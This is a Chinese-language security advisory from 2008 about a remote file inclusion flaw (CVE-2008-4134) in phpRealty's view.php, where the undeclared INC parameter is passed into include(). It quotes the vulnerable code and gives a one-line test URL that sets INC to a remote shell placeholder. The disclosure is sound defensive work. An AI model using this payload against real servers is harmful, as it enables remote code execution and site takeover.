投稿说明 bitsCN.com > 网络技术 > 安全公告 >
phpRealty view.php远程文件包含漏洞
发布日期:2008-09-17
更新日期:2008-09-23
受影响系统:
phpRealty Software phpRealty <= 0.03
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 31213
CVE(CAN) ID: CVE-2008-4134
phpRealty是基于PHP/MYSQL的内容管理软件。
phpRealty的manager/static/view.php文件中没有正确地过滤INC参数,远程攻击者可以通过包括本地或远程资源导致执行任意代码。
相关的代码如下:
11: if(!isset($_GET['propID']) || !is_numeric($_GET['propID']) || empty($_GET['propID'])){
13: return;
17: include($INC."curr_conv.class.php"); // -------->>> Vuln Line!!
// the var $INC isn't declared
<*来源:ka0x (ka0x01@gmail.com)
链接:http://www.milw0rm.com/exploits/6473
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC=[SHELL]?
建议:
--------------------------------------------------------------------------------
厂商补丁:
phpRealty Software
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://php-realty.com/home.html
推荐文章
相关文章
热门文章